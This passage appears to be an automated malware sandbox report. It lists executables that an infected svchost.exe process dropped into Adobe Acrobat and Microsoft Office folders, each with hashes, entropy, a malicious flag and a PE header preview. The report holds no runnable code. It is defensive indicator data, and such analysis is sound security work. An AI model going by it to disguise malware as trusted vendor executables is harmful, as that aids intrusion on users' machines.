                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1143296
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0226402884884624
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:9Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:9sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5EF9F78E0CB53186F1228D3219977F47
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2EA8A95E474E81D88127E61A023F31BD0CFA4ACE
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:808D66AAED4B1FE78F1791431DE34917DC95F0219E9A4F1743FF74B0303FA2FE
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AD2CC1B3F4070FB30A4BDB1E60CE17B11568248DD8E161ABE6107108D79B43CF68A0078F50AE440AB5CA47FFE5809A6C7617B9B0099D43CEB9130017234D8170
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@....................................D8.... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...P.......@...2..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1161728
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.047111327468344
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:3iXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:ysqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8BCCEFBC87AFC02A471DA9A407BFA1BB
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:80DC474A26064B994CB8579E02478F14CB704F75
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D070315F08B6FB1AF99428CDA1C8E49F9314433DD43635C451AEEC620EF06FAC
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AFB6B4F99835679772708AC23B64FE72B97AEA39F825806700D163AEFD345636EA08875D33D890E44EE1A88005738675616F9871D5B8E8E27C20B717B874260A
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@.......................................... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...P.......@...z..............@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4151808
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.499771745843665
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:rtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755XDmg27RN:rjEIa4HIEWOc5xD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DCA9850B09475498F673A7427C7D066E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E67C7187469E1F422104CCC51550B60B0BEC33C5
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:24166B9D863A8757947A793C8BD2183BF8C31B850A53E44E8234F4F73D0A6E52
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6FE1A25774B96C654D57016C86341061B7E80F93056E6C228A1402056B26F1BFA720F517010AC6AED5838BB5B7E8A52DFDDC2C64728CE93B50F0AB07C9A9AD5F
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @......-@... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):59941376
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9993672734781915
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1572864:LQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:8XhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8DDFA4B4403CB3B96328B347F576A2DE
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7C27BA81ED622D5F93140E8223B63D40816766EF
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B67390FB5C76AECE838B8D0BA4B2703126E4776D1F0D4239D606D6E82EFCA9C4
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4CF20C007D71F4886ACA0B927324A18C897CEE6629C2133A83CFC586A0E2EEA38CE7A65CB384505DA60E263D9EF95281A2CA22F0CEA2CE6786E2F65E9EB4542C
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0............ .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1230336
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.185573041559299
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:9ejVWYUAiXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:ojkY7isqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9725D768CFCB8A1EC80DDAED2050F047
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6801BD4EB77BF8DA6C42792CD0C0413A68C13A86
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2C1B9713879E9775AB3B287ECD095765625A1AF271A579E33E4AFD72840D3871
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:48CD4CEA4E9CBBCFCEBA2DFFE2CB52561E78377D2F9C2D5432F29D58BF07D22D79C99CF1C342C5C83440B4B576BEB07E6825421E9A5A89F49CF335444F6F3916
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@..........................................................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...`.......P...v..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1384960
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.377789790715262
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:0xwSJhkrmZsmsqjnhMgeiCl7G0nehbGZpbD:0y+krKsqDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DD277D3A0F37FDC948E52CD5317D0F77
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A3D5C27E3603F302E07A1C61570E7C7FD042367D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E37D3DB89208BC0AB2686E3746DAB63A2AD1A376FA18CE82F1C4CB2F8E163951
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:240589254E3B644007703099490374B4B74E1F7C0E598418310B978018B5D0CE03EB30BEE04185A2B8A18171B51C36F44164DC0AF7DE4276EF86AFA5D7C493BF
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@.....................................".... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...P...0...@..................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1649152
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.63271125896002
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:mHQJLIRgvsnN/sqjnhMgeiCl7G0nehbGZpbD:mHQJL34jDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9F010096AAC42CFE84944F6F57587F1E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C079B00E760E320D7E454FBBC03ACCBBF37ACA93
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:92EBB856AF6B413BCA2B80633EC190498CE5B440BA2928810659733649B9F321
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:0160EFE1DFF295F9846645E521DFE671E5C5AF3E374929C3112B2FE24A0D6F3E38F3BF8664551204F235EDBD81E9E41BAEB75DF8A2CA39847FAD5D292C50AE2A
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@....................................i9.... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5365760
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.450965823332219
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:aUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1ki:1WmXL6DEC7dRpKuDQbgED527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2B15C93D0DDB63C9923D7BD99C5FC225
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7AD5E2DEAC8BAF5FA46B00369FB69D253318F711
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:678F2C94D04B456643739C09CEA3536CBFC1F4F1B4815A19B8E3B245CA54A3B2
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:116AD761E3196953B4A3D0E604B91197DA362EC63F574795CF9F1DC0E49B034531F227B24BCC98A32BFBEB89445FE2DE5DC3744D816321A81FDEF1A26D00A72A
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R.......R..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3163136
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.972777283936134
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:98304:ErZ23AbsK6Ro022JjL2WEiVqJZ3D527BWG:uJADmmxL2WEoCZ3VQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:91FCBF270F41066F4B3238A370C4688D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:607C432A935D3A31EE44961751E4DE199413DB10
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:55CD63214395C84AA7D610CBAFC54982B2048C10645521F5E2149B2D380E3CF7
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A85E51DEBCC507CEB913B38B61E07B3CF43A46443C7552D1B2CBDC98197E215E3C510B76F3A84A31F805CB01B998141E17759AB83BD17F07E70A2B4E5EF6E1EB
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1.......0.......... .....................................0............................!............................................... ...............................text....|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1213440
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.204886305418516
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:CfrYY42wd7hlOw9fpkEE642sqjnhMgeiCl7G0nehbGZpbD:bz9xrS6Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6FD1D6B3C67E2BF0562D385F79648AA7
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:71F00FDC3BDCB977083F91977FED360F637C22D0
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8DEAF12FA6767290837A24544D05C14B7E51579857D61A777E27419E5DF2E07D
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3E652B63A5E1E6DF68C24A7C1BA2B325DB60DC75FF1D9189490135D70A9FE1C1B0667B68C808DB0298DE94FE8E159090230364EAC47864E1E11889BBCBAA03D2
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. ............ ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1388544
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.272904915898396
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:ewkNKiZ+R2GGNUbTF5NXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:ezNKUE5NsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3D1B24361F7C623439EEAF58E43E1C94
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:DAED78C338036E6ACD48E8AFD17D38BE26A8728A
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E64A2C40E7FC72CA44AF7C4BD910A316DDE78C7BBCBF31D087FC88C0E7A1594F
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8139070E2DDF9D76AA5A830BEAA281A6976F3BC30B95774A281EBFB7027831BCEFA4C90EBE3BFF82E1252405B17446FEC074EEB0A70F0C8FF298376043036E76
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................P......./.... .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5855744
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.574327395003131
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:98304:MALuzDKnxCp3JKNrPJzruaI6HMaJTtGb4D527BWG:vaGg3cFPIaI6HMaJTtGb4VQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3B8D6538A2B6A601101CC6347C7D05A4
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0C68475E2B80E7B631DF126318FD73E91D443486
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4FE09A01E0A6158134E6BECA72439256B07A3404F6316F714AA16A943A07C7A9
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2A3B5DBD267A323D3620168AB3553963E92205C79B66786E21ADF0D0F8016365E73BE36B6E85BCA40BB3E0C4968077BF6E8E3940FB98713B1F90B489536BECB7
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y.....DZY... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1312768
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.356039735179107
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:qXr/SVMxWqsqjnhMgeiCl7G0nehbGZpbD:y1x3Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:710E7CF48EE8FE9E7868136883BAB3A7
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B0B45DA558334EE7D93C91ABD86380E4E1498442
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F63150BC570AE94EB9E926A7DB5B34D4E155589E06E350EBAC2E85263D5B46E0
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:37FA56DB267985CAA079D404AA0496DA2B26A139E1E9147188627383D0198E77914464EBA752AD5A3142B6BE83B2C1A53633C00B4882E8CAF7237F3758FF3F15
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................P......h2........... ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc...p.......`..................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):27533312
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.248636554926311
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:196608:2hRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQO0VQBWG:2hRCpGpMJMrbp8JjpNdNlc5MB
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:24C662E3982AA12CF76D24F1CBFFF786
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:21960AAE58899C1EEEDF2BCDAAAF0D59D03866D6
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2507888A0BD3D961A5962FA10800F6DB8330150D0E629505C9B6346BF3118A68
